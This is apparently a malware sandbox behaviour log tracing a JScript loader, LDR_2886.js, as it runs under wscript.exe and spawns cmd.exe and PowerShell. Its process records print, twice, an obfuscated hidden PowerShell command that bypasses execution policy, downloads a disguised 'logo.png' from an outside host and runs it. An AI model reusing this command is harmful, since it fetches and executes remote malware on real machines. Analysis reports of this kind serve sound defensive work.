Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:47:25 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 213268	1	Fn
System	Get Time	type = Performance Ctr, time = 26795707496	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 213284	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = î1	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:47:25 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 213534	1	Fn
System	Get Time	type = Performance Ctr, time = 26822247545	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:47:25 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 213658	1	Fn
System	Get Time	type = Performance Ctr, time = 26834217934	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 213908	1	Fn
System	Get Time	type = Ticks, time = 213924	2	Fn
System	Get Time	type = Ticks, time = 214470	5	Fn
System	Get Time	type = Ticks, time = 214579	10	Fn
System	Get Time	type = Ticks, time = 214594	7	Fn
System	Get Time	type = Ticks, time = 214610	4	Fn
System	Get Time	type = Ticks, time = 214719	4	Fn
System	Get Time	type = Ticks, time = 214735	4	Fn
System	Get Time	type = Ticks, time = 214750	2	Fn
System	Get Time	type = Ticks, time = 214860	1	Fn
System	Get Time	type = Ticks, time = 214875	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:47:27 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 214891	1	Fn
System	Get Time	type = Performance Ctr, time = 26957309841	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff1f0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xff1fd7f8	1	Fn
System	Get Time	type = Ticks, time = 214891	1	Fn
COM	Get Class ID	cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = shell.applicatiOn	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = Ticks, time = 215000	2	Fn
Process	Create	process_name = cmd.exe, show_window = 3254896	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0xd68

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 5200480		1	Fn

Process #46: cmd.exe

62

0

»

Information	Value
ID	#46
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:26, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:01:59

OS Process Information

»

Information	Value
PID	0xd88
Parent PID	0xd50 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D8C

Threads

Thread 0xd8c

62

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:47:30 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 218136	1	Fn
System	Get Time	type = Performance Ctr, time = 27282847864	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Get Info	filename = PowErshelL.eXe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xda4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #47: powershell.exe

330

0

»

Information	Value
ID	#47
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:28, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:01:56

OS Process Information

»

Information	Value
PID	0xda4
Parent PID	0xd88 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x DA8 0x DAC 0x DB0 0x DB4 0x DB8 0x DBC 0x DC4 0x DC8

Threads

Thread 0xda8

295

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
